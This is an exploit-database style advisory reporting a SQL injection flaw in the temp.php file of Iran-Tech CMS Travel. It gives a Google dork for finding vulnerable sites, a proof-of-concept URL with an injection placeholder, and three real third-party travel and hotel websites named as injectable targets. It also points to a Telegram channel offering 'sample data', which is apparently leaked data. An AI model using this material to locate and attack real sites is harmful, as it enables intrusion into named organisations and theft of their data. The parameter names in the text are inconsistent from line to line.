####
#Exploit Title : Iran-Tech CMS Travel SQL Injection
#Author : Iran_bugs_report
#Home page Link : http://www.iran-tech.com
#Date : 2020-06-05
#Version: All versions
#Google Dork: [intext:"طراحی سایت: ایران تکنولوژی"] && find portfolio from here : http://www.iran-tech.com/portfolio/
#Contact:
#CrackSoftwareIrani@gmail.com
#OR
#CRACKANDHACK@protonmail.com
#OR
#Channel & Sample Data :
#https://t.me/Iran_bugs_report
####
// Vulnerability Description:
SQL injection vulnerability:-
==============================
in file temp.php data from GET parameter 'irantech_parvaz' and 'ID' is not getting filter before passing into SQL query and hence
rising SQL Injection vulnerability
Example :
"temp.php?irantech_parvaz=170&id=1"
-------------------
POC
-------------------
http://127.0.0.1/fa/user/temp.php?irantech_cms=SQL&ID=SQL {Injection_Here}
--------------------
POC
--------------------
Example for sql injection :
http://tariqagency.ir/en/user/temp.php?irantech_parvaz=170&id=1
https://mosafer24.ir/fa/user/temp.php?irantech_parvaz=iranhoteldetail&idhotel=31&idcity=80&level22=15
http://www.sarahotel.org/fa/user/temp.php?irantech_parvaz=contactus